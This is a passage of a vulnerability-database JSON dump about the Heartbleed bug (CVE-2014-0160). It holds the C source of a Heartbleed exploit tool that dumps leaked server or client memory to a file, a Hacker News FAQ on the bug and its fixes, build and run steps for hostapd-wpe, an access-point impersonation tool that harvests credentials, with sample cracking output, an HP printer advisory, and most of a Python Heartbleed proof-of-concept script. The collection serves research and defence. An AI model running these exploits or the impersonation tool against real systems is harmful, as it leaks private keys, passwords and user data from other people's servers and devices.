1;\r\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\r\n\t\t\t\t\tif(h==NULL){\r\n\t\t\t\t\t\tprintf("[!] 
FATAL: unknown host '%s'\\n",optarg);\r\n\t\t\t\t\t\texit(1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(host==NULL){\r\n \t\t\t\tprintf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n \t\t\t}\r\n\t\t\t\tbreak;\r\n\t case 'p':\r\n\t\t\t\tif(iport==0){\r\n\t\t\t\t\tport = atoi(optarg);\r\n\t\t\t\t\tiport = 1;\r\n\t\t\t\t}\r\n \t break;\r\n\t\t\tcase 'f':\r\n\t\t\t\tif(ifile==0){\r\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(file==NULL){\r\n\t\t\t\t printf("[ error in malloc()\\n");\r\n \t\t\t\texit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(file,"%s",optarg);\r\n\t\t\t\t\tifile = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 't':\r\n\t\t\t\tif(itype==0){\r\n\t\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\t\titype = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'h':\r\n\t\t\t\tusage();\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'b':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\r\n\t\t\t\t\tif(host==NULL){\r\n\t\t\t \t printf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n\t\t\t\t }\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n\t\t\t\t\tbind = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'c':\r\n\t\t\t\tif(iprecmd == 0){\r\n\t\t\t\t\tiprecmd = 1;\r\n\t\t\t\t\tprecmd = atoi(optarg);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'v':\r\n\t\t\t\tverbose = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n\t\t\t\tloop = 1;\r\n\t\t\t\tbreak;\r\n \t case 'u':\r\n\t\t\t\tudp = 1;\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tdefault:\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif(ihost==0||iport==0||ifile==0||itype==0){\r\n\t\tprintf("[ try --help\\n");\r\n\t\texit(0);\r\n\t}\r\n\tssl_init();\r\n\tif(bind==0){\r\n\t\tif (udp){\r\n\t\t\tc = dtls_client(ret, host, port);\r\n\t\t\tdtlsheartbleed(c, 
type);\r\n\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t\twhile(loop==1){\r\n\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\tfirst=0;\r\n\t\t\t\trepeat=1;\r\n\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse {\r\n\t\t\tret = tcp_connect(host, port);\r\n\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\tc = tls_connect(ret);\r\n\t\t\theartbleed(c,type);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t\twhile(loop==1){\r\n\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\tfirst=0;\r\n\t\t\t\trepeat=1;\r\n\t\t\t\theartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tSSL_shutdown(c->sslHandle);\r\n\t\tclose (ret);\r\n\t\tSSL_free(c->sslHandle);\r\n\t}\r\n\telse{\r\n\t\tint sd, pid, i;\r\n\t\tif (udp) {\r\n\t\t\tc = dtls_server(sd, host, port);\r\n\t\t\twhile (1) {\r\n\t\t\t\tchar * bytes = malloc(1024);\r\n\t\t\t\tstruct sockaddr_in peer;\r\n\t\t\t\tsocklen_t len = sizeof(peer);\r\n\t\t\t\t\tif (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\r\n\t\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\twhile(loop==1){\r\n\t\t\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\t\t\tfirst=0;\r\n\t\t\t\t\t\t\trepeat=0;\r\n\t\t\t\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse {\r\n\t\t\tret = tcp_bind(host, port);\r\n\t\t\twhile(1){\r\n\t \t\t\tsd=accept(ret,0,0);\r\n\t\t\t\tif(sd==-1){\r\n\t\t\t\t\tprintf("[!] 
FATAL: problem with accept()\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tif(pid=fork()){\r\n\t\t\t\t\tclose(sd);\r\n\t\t\t\t}\r\n\t \t\t\telse{\r\n\t\t\t\t\tc = tls_bind(sd);\r\n\t\t\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t}\r\n\t\t\t\t\twhile(loop==1){\r\n\t\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\t\tfirst=0;\r\n\t\t\t\t\t\trepeat=0;\r\n\t\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\tprintf("[ done.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86255"}], "thn": [{"lastseen": "2018-01-27T09:17:11", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "[](<https://4.bp.blogspot.com/-svp9PF6wRBU/U0zgP6p7T4I/AAAAAAAAbOU/05vHzW4cmI4/s1600/heartbleed.png>)\n\n_**Heartbleed**_ \u2013 I think now it\u2019s not a new name for you, as every informational website, Media and Security researchers are talking about probably the biggest Internet vulnerability in recent history. It is a critical bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allows attackers to read portions of the affected server\u2019s memory, potentially revealing users data, that the server did not intend to reveal.\n\n \n\n\nAfter the story broke online, websites around the world flooded with the heartbleed articles, explaining how it works, how to protect, and exactly what it is. Yet many didn\u2019t get it right. So based on the queries of Internet users, we answered some frequently asked questions about the bug.\n\n \n\n\n**1.) IS HEARTBLEED A VIRUS?**\n\nAbsolutely NO, It's not a virus. 
As described in our previous [article](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>), the Heartbleed bug is a vulnerability residing in the TLS heartbeat mechanism built into certain versions of OpenSSL, a popular open source implementation of the Transport Layer Security (TLS) protocol.\n\n \n\n\n**2.) HOW IT WORKS?**\n\nTo keep an SSL/TLS connection open, your computer can send the server '_**heartbeats**_' that keep informing the server that the client (computer) is online (alive). Each heartbeat carries a small payload together with a field stating how long that payload is, and the receiver echoes the payload back; vulnerable OpenSSL versions trusted the stated length without checking it against the data actually received.\n\n \n\n\nThe Heartbleed attack allows an attacker to retrieve a block of the server's memory, up to 64KB per request, directly from the vulnerable server by sending a malicious heartbeat, and there is no limit on the number of attacks that can be performed. [Technically Explained by Rahul Sasi on [Garage4hackers](<http://www.garage4hackers.com/entry.php?b=2551>)]\n\n \n\n\nIt opens doors for cyber criminals to extract sensitive data directly from the server's memory without leaving any traces in the server's ordinary logs.\n\n[](<https://2.bp.blogspot.com/-0_DevhynabI/U0zUQQ-yUXI/AAAAAAAAbN8/UurRUbKnZbc/s1600/heartbleed_explanation.png>) \n--- \n_xkcd comic http://xkcd.com/1354/_ \n**3.) HEARTBLEED ATTACK RELIES ON MAN-IN-THE-MIDDLE ATTACK?**\n\nNo, it has nothing to do with a Man-in-the-Middle (MitM) attack. But using a Heartbleed attack, one can manage to obtain the private encryption key for an SSL/TLS certificate and could then set up a fake website that passes the security verification.\n\n \n\n\nAn attacker holding that key could also decrypt the traffic passing between a client and a server, i.e. carry out a perfect man-in-the-middle attack on an HTTPS connection.\n\n \n\n\n**4.) IS IT A CLIENT SIDE OR SERVER SIDE VULNERABILITY?**\n\nTLS heartbeats can be sent by either side of a TLS connection, so the bug can be used to attack clients as well as servers. 
An attacker can obtain up to 64K of memory from a server, or equally from a client, that uses an OpenSSL implementation vulnerable to Heartbleed (_CVE-2014-0160_).\n\n \n\n\nResearchers [estimated](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>) that two-thirds of the world's servers, i.e. half a million servers, are affected by the Heartbleed Bug, including websites, email, and instant messaging services.\n\n \n**Video Explanation:** \n\n\n**5.) HOW HEARTBLEED AFFECTS SMARTPHONES?**\n\nThe smartphone is the best practical example of client-side attacks.\n\n \n\n\nAll versions of Android OS include outdated versions of the OpenSSL library, but only Android 4.1.1 Jelly Bean has the vulnerable heartbeat feature enabled by default. Blackberry also [confirmed](<https://thehackernews.com/2014/04/billions-of-smartphone-users-affected_13.html>) that some of its products are vulnerable to the Heartbleed bug, whereas Apple's iOS devices are not affected by the OpenSSL flaw.\n\n \n\n\nGoogle had patched the affected version, Android 4.1.1, but it will take a long time to deliver the updated Android version to end users, as updates to the majority of handsets are controlled by phone manufacturers and wireless carriers. Until then, users running the affected versions are vulnerable to the attacks, and hackers will definitely take advantage of this public disclosure.\n\n \n\n\n**6.) 
WHAT ELSE COULD BE VULNERABLE TO HEARTBLEED?**\n\nIP phones, Routers, Medical devices, Smart TV sets, embedded devices and millions of other devices that rely on OpenSSL to provide secure communications could also be vulnerable to the Heartbleed bug, as these devices are not expected to get the updates soon from Google\u2019s Android partners.\n\n \n\n\nYesterday, Industrial Control Systems-CERT also [warned](<http://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-099-01B>) critical infrastructure organizations (like energy, utilities or financial services companies) to beef up their systems in order to defend against Heartbleed attacks.\n\n \n\n\n**7.) WHO IS RESPONSIBLE FOR HEARTBLEED?**\n\nWe actually can't blame any one developer, especially those who are contributing to Open Source projects without monetary motivation. \n\n \n\n\nDr. Robin Seggelmann, a 31-year-old German developer who actually introduced the Heartbeat concept to OpenSSL on New Year's Eve, 2011, says it was just a programming error in the code that unintentionally created the \u201c_Heartbleed_\u201d vulnerability.\n\n \n\n\nThe mistake, which he described as \"_In one of the new features, unfortunately, I missed validating a variable containing a length_\", went undetected by the code reviewers and everyone else for over two years. He [claimed](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>), '_I did so unintentionally_'.\n\n \n\n\n**8.) WHO HAS EXPLOITED THIS BUG YET?**\n\nBloomberg accused the National Security Agency (NSA) of knowing about the Heartbleed bug for the last two years. Not only that, the report says the agency was using it continuously to gain information instead of disclosing it to the OpenSSL developers. If that is so, then this would be one of the biggest developments in the history of wiretapping ever. 
However, the agency [denied](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>) it saying NSA was not aware of Heartbleed until it was made public.\n\n \n\n\nBut when it comes to exploit any known vulnerability, then Hackers are most likely to be top on the list. As the flaw was so widely spread that it affected half a million websites worldwide, so after the public disclosure, the cybercriminals could reach the sites to steal credentials, passwords and other data, before the site operators apply the freely available patch.\n\n \n\n\nThere are multiple Proof-of-concept exploits available for the Heartbleed flaw:\n\n * [Python Script](<https://gist.github.com/mpdavis/10171593>)\n * [Metasploit Module](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * [C Code](<https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c>)\n * [NMAP script](<https://github.com/sensepost/heartbleed-poc>)\n * [Python Script by Rahul Sasi](<https://bitbucket.org/fb1h2s/cve-2014-0160/src/2b1fff1a62e29397ff60586557c96989c7b64662/Heartbeat_scanner.py?at=master>)\n\n**9.) CHANGING ACCOUNT PASSWORDS CAN SOLVE THE ISSUE?**\n\nNot exactly, as Heartbleed attack has the ability to leak anything from the server including your passwords, credit card details or any kind of personal information. 
But, in order to protect your online accounts you should at least change your passwords immediately for the sites that resolved the issue and for the sites not affected by the bug as well, just to make sure that you are safe.\n\n \n\n\nFirst of all, check on an individual basis whether the sites you use every day are vulnerable to the Heartbleed bug, using the following services or apps; if you're given a red flag, avoid the site for now:\n\n * [http://filippo.io/Heartbleed/](<https://filippo.io/Heartbleed/>)\n * [Provensec Scanner](<http://provensec.com/heartbleed/>)\n * [GlobalSign SSL Configuration Checker](<https://sslcheck.globalsign.com/>)\n * [ADTsys Checker](<http://seguranca.adtsys.com.br/>)\n * The easiest way to keep yourself safe is to use a new add-on for the Chrome browser, [Chromebleed](<https://chrome.google.com/webstore/detail/chromebleed/eeoekjnjgppnaegdjbcafdggilajhpic>), created by security researcher Jamie Hoyle.\n * To check whether your Android devices are safe or not, you can install the [Bluebox Heartbleed Scanner](<https://play.google.com/store/apps/details?id=com.bblabs.heartbleedscanner>) available on the Google Play Store. The Bluebox Heartbleed Scanner looks for apps installed on your device that have bundled their own version of OpenSSL and the scanner also checks the version of the library and whether heartbeat is enabled or not.\n\nWell, nobody is sure at this point, because Heartbleed is stealthy, as it leaves no traces behind, and this makes the matter worse.\n\n \n\n\nYou may never know if you have been hacked using the flaw or not. This means that there is no way to tell if your information was stolen previously from a site or a service that has now fixed it.\n\n \n\n\nBut if you haven't changed the passwords for the popular sites yet, then yes, your password and financial information are still wide open to cybercriminals and other spying agencies.\n\n \n\n\n**10.) WHAT SHOULD I DO TO PROTECT MYSELF?**\n\nFirst of all DON'T PANIC. 
You have to change your password everywhere, assuming that it was all vulnerable before, just to make sure that you are now safe. But hold on... If some sites are still affected by the flaw, then your every effort is useless: it\u2019s up to the site to first fix the vulnerability as soon as possible, because changing the password before the bug is fixed could compromise your new password as well. \n \nIf you own a vulnerable SSL Service, then you are recommended to: \n\n\n * Upgrade the OpenSSL version to [1.0.1g](<https://www.openssl.org/source/>)\n * Request revocation of the current SSL certificate\n * Regenerate your private key (only after the upgrade, since a key generated while the service is still vulnerable can be leaked the same way)\n * Request and replace the SSL certificate\n\nDon't reuse any old passwords, and it is good practice to use two-factor authentication, which means that, along with the password, the account requires a freshly generated pass code that shows up only on your personal smartphone before you can get into certain sites. \n \nStay Safe! \n\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n * [NSA denies Report that Agency knew and exploited Heartbleed Vulnerability](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>)\n", "modified": "2014-04-17T10:28:24", "published": "2014-04-14T20:40:00", "id": "THN:244769C413FFA5BE647D8F6F93431B74", "href": "https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html", "type": "thn", "title": "HeartBleed Bug Explained - 10 Most Frequently Asked Questions", 
"cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "n0where": [{"lastseen": "2019-05-29T18:37:05", "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "description": "## hostapd-wpe \u2013 Wireless Pwnage Edition \u2013 \n\n* * *\n\nhostapd-wpe is the replacement for [ FreeRADIUS-WPE ](<http://www.willhackforsushi.com/?page_id=37>) . It implements IEEE 802.1x Authenticator and Authentication Server impersonation attacks to obtain client credentials, establish connectivity to the client, and launch other attacks where applicable. \n\nhostapd-wpe supports the following EAP types for impersonation: \n\n 1. EAP-FAST/MSCHAPv2 (Phase 0) \n 2. PEAP/MSCHAPv2 \n 3. EAP-TTLS/MSCHAPv2 \n 4. EAP-TTLS/MSCHAP \n 5. EAP-TTLS/CHAP \n 6. EAP-TTLS/PAP \n\nOnce impersonation is underway, hostapd-wpe will return an EAP-Success message so that the client believes they are connected to their legitimate authenticator. For 802.11 clients, hostapd-wpe also implements [ Karma-style gratuitous probe ](<http://www.foofus.net/?page_id=115>) responses \u2013 by JoMo-Kun\u2019s patch for older versions of hostapd. hostapd-wpe also implements CVE-2014-0160 (Heartbleed) attacks against vulnerable clients \u2013 provided by the [ Cupid PoC: ](<https://github.com/lgrangeia/cupid>) hostapd-wpe logs all data to stdout and hostapd-wpe.log \n\nThe current hostapd-wpe.patch is for: hostapd-2.2.tar.gz \n\n## Quick Usage \n\nOnce hostapd-wpe.patch is applied, hostapd-wpe.conf will be created at /path/to/build/hostapd/hostapd-wpe.conf. See that file for more information. Note that /path/to/build/hostapd/hostapd-wpe.eap_users \nwill also be created, and hostapd-wpe is dependent on it. 
\n\n## Basic usage: \n \n \n hostapd-wpe hostapd-wpe.conf\n\nCredentials will be displayed on the screen and stored in hostapd-wpe.log \n\nAdditional WPE command line options are: \n\n * ** -s ** \u2013 Return EAP-Success messages after credentials are harvested \n * ** -k ** \u2013 Gratuitous probe responses (Karma mode) \n * ** -c ** \u2013 Attempt to exploit CVE-2014-0160 (Cupid mode) \n\n## Building \n \n \n $ git clone https://github.com/OpenSecurityResearch/hostapd-wpe\n\nUbuntu/Debian/Kali Building \n \n \n $ apt-get update\r\n $ apt-get install libssl-dev libnl-dev\n\nif you\u2019re using Kali install: \n \n \n $ apt-get install libssl-dev libnl-genl-3-dev\n\n## General \n\nNow apply the hostapd-wpe.patch: \n \n \n $ git clone https://github.com/OpenSecurityResearch/hostapd-wpe\n \n \n $ wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz\r\n $ tar -zxf hostapd-2.2.tar.gz\r\n $ cd hostapd-2.2\r\n $ patch -p1 < ../hostapd-wpe/hostapd-wpe.patch\r\n $ cd hostapd\n\nIf you\u2019re using Kali 2.0 edit .config file and uncomment: \n \n \n CONFIG_LIBNL32=y\n \n \n $ make\n\nCopy the certs directory and scripts from FreeRADIUS to ease that portion of things. You should just be able to: \n \n \n $ cd ../../hostapd-wpe/certs\r\n $ ./bootstrap\n\nthen finally just: \n \n \n $ cd ../../hostapd-2.2/hostapd\r\n $ sudo ./hostapd-wpe hostapd-wpe.conf\n\n## Running Access Point Impersonation Attacks: \n\nWith all of that complete, you can run hostapd. The patch will create a new hostapd-wpe.conf, which you\u2019ll likely need to modify in order to make it work for your attack. Once ready just run \n \n \n hostapd hostapd-wpe.conf\n\nLook in the output for the username/challenge/response. 
It\u2019ll be there and in a hostapd-wpe.log file in the directory you ran hostapd from for instance here are the EAP-FAST Phase 0 creds from stdout: \n \n \n username: jdslfkjs\r\n challenge: bc:87:6c:48:37:d3:92:6e\r\n response: 2d:00:61:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0\n\nand as always, we feed them into asleap to crack: \n \n \n # asleap -C bc:87:6c:48:37:d3:92:6e -R 2d:00:61:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0 -W wordlist\r\n asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>\r\n hash bytes: b1ca\r\n NT hash: e614b958df9df49ec094b8730f0bb1ca\r\n password: bradtest\n\nAlternatively MSCHAPv2 credentials are outputted in john the rippers NETNTLM format. \n\n## EAP-Success \n\nCertain EAP types do not require the server to authenticate itself, just to validate the client\u2019s submitted credentials. Since we\u2019re playing the authentication server, that means we can easily just return an EAP-Success message to the client regardless of what they send us. The client is happy because they\u2019ve connected, but unfortunately are unaware that they are connected to an unapproved authenticator. \n\nAt this point, the attacker can set up a dhcp server and give the client an IP and then do whatever they\u2019d like (e.g. redirect dns, launch attacks, MiTM, etc..) \n\nMSCHAPv2 protects against this by having the server prove knowledge of the password most supplicants adhere to this policy, but we return EAP-Success just in case. \n\n## Karma-Style Probes \n\nThis functionality simply waits for an client to send a directed probe, when it does, it assumes that SSID and responds to the client. Only applicable to 802.11 clients. \n\n## A note on MSCHAPv2 \n\nMicrosoft offers something called \u201cComputer Based Authentication\u201d. When a computer joins a domain it is assigned a password. This password is stored on the system and in active directory. 
We can harvest the MSCHAPv2 response from these systems but its going to take a lifetime to crack. Unless you\u2019re just trying to solve for the hash, and not the actual password \ud83d\ude42 \n\nOne other thing to note, if the client returns all zeros, it isnt joined to a domain. \n\n## Source && Download \n\n[  ](<https://github.com/OpenSecurityResearch/hostapd-wpe>)\n", "edition": 4, "modified": "2016-04-12T22:19:39", "published": "2016-04-12T22:19:39", "id": "N0WHERE:76566", "href": "https://n0where.net/access-point-impersonation-attacks-hostapd-wpe", "title": "Access Point Impersonation Attacks: hostapd-wpe", "type": "n0where", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "hp": [{"lastseen": "2020-12-24T13:21:11", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "## Potential Security Impact\nRemote disclosure of information \n\n## VULNERABILITY SUMMARY\nA potential security vulnerability has been identified in HP Officejet Pro X printers and in certain Officejet Pro printers running OpenSSL. This is the OpenSSL vulnerability known as \"Heartbleed\" (CVE-2014-0160) which could be exploited remotely resulting in disclosure of information. \n\n## RESOLUTION\nHP has provided firmware updates for impacted printers as set forth in the table below. To obtain the updated firmware, go to the HP Software and Drivers page for your product and find the firmware update from the list of available software. 
\n\nProduct Name \n\n| \n\nModel Number \n\n| \n\nFirmware Revision \n \n---|---|--- \n \nHP Officejet Pro X451dn Printer \n\n| \n\nCN459A \n\n| \n\nBNP1CN1409BR \n \nHP Officejet Pro X451dw Printer \n\n| \n\nCN463A \n\n| \n\nBWP1CN1409BR \n \nHP Officejet Pro X551dw Printer \n\n| \n\nCV037A \n\n| \n\nBZP1CN1409BR \n \nHP Officejet Pro X476dn Multifunction Printer \n\n| \n\nCN460A \n\n| \n\nLNP1CN1409BR \n \nHP Officejet Pro X476dw Multifunction Printer \n\n| \n\nCN461A \n\n| \n\nLWP1CN1409BR \n \nHP Officejet Pro X576dw Multifunction Printer \n\n| \n\nCN598A \n\n| \n\nLZP1CN1409BR \n \nHP Officejet Pro 276dw Multifunction Printer \n\n| \n\nCR770A \n\n| \n\nFRP1CN1416BR \n \nHP Officejet Pro 251dw Printer \n\n| \n\nCV136A \n\n| \n\nEVP1CN1416BR \n \nHP Officejet Pro 8610 e-All-in-One Printer \n\n| \n\nA7F64A \n\n| \n\nFDP1CN1416AR \n \nHP Officejet Pro 8615 e-All-in-One Printer \n\n| \n\nD7Z36A \n\n| \n\nFDP1CN1416AR \n \nHP Officejet Pro 8620 e-All-in-One Printer \n\n| \n\nA7F65A \n\n| \n\nFDP1CN1416AR \n \nHP Officejet Pro 8625 e-All-in-One Printer \n\n| \n\nD7Z37A \n\n| \n\nFDP1CN1416AR \n \nHP Officejet Pro 8630 e-All-in-One Printer - \n\n| \n\nA7F66A \n\n| \n\nFDP1CN1416AR \n \nHP Officejet Pro 8640 e-All-in-One Printer \n\n| \n\nE2D42A \n\n| \n\nFDP1CN1416AR \n \nHP Officejet Pro 8660 e-All-in-One Printer \n\n| \n\nE1D36A \n\n| \n\nFDP1CN1416AR \n", "edition": 3, "modified": "2014-07-12T00:00:00", "published": "2014-04-30T00:00:00", "id": "HP:C04272043", "href": "https://support.hp.com/us-en/document/c04272043", "title": "HPSBPI03031 rev.3 - HP Officejet Pro X Printers, Certain Officejet Pro Printers, Remote Disclosure of Information", "type": "hp", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure", "edition": 1, "published": "2014-04-08T00:00:00", "title": "OpenSSL TLS Heartbeat Extension - Heartbleed Memory 
Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "EXPLOITPACK:596E856FF8E5B47CBB4EE985B0B99685", "href": "", "sourceData": "#!/usr/bin/python\n\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\n\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\n\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\n\ndef h2bin(x):\n return x.replace(' ', '').replace('\\n', '').decode('hex')\n\nhello = h2bin('''\n16 03 02 00 dc 01 00 00 d8 03 02 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01 \n''')\n\nhb = h2bin(''' \n18 03 02 00 03\n01 40 00\n''')\n\ndef hexdump(s):\n for b in xrange(0, len(s), 16):\n lin = [c for c in s[b : b + 16]]\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin)\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\n print\n\ndef recvall(s, length, timeout=5):\n endtime = time.time() + timeout\n rdata = ''\n remain = length\n while remain > 0:\n rtime = endtime - time.time() \n if rtime < 0:\n return None\n r, w, e = select.select([s], [], [], 5)\n if s in r:\n data = s.recv(remain)\n # EOF?\n if not data:\n return None\n rdata += data\n remain -= len(data)\n return rdata\n \n\ndef recvmsg(s):\n hdr = recvall(s, 5)\n if hdr is None:\n print 'Unexpected EOF receiving record header - server closed connection'\n return None, None, None\n typ, ver, ln = struct.unpack('>BHH', hdr)\n pay = recvall(s, ln, 10)\n if pay is None:\n print 'Unexpected EOF receiving record payload - server closed connection'\n return None, None, None\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n return typ, ver, pay\n\ndef hit_hb(s):\n s.send(hb)\n while True:\n typ, ver, pay = recvmsg(s)\n if typ is None:\n print 'No heartbeat response received, server likely not vulnerable'\n return False\n\n if typ == 24:\n print 'Received heartbeat response:'\n hexdump(pay)\n if len(pay) > 3:\n print 'WARNING: server returned more data than it should - server is vulnerable!'\n else:\n print 'Server processed malformed heartbeat, but did not return any extra data.'\n return True\n\n if typ == 21:\n print 'Received alert:'\n hexdump(pay)\n print 'Server returned error, likely not vulnerable'\n return False\n\ndef main():\n opts, args = options.parse_args()\n if len(args) < 1:\n options.print_help()\n return\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print 'Connecting...'\n sys.stdout.flush()\n s.connect((args[0], opts.port))\n print 'Sending Client Hello...'\n sys.stdout.flush()\n s.send(hello)\n print 'Waiting for Server Hello...'\n sys.stdout.flush()\n while True:\n typ, ver, pay = recvmsg(s)\n if typ == None:\n print 'Server closed connection without sending Server Hello.'\n return\n # Look for 
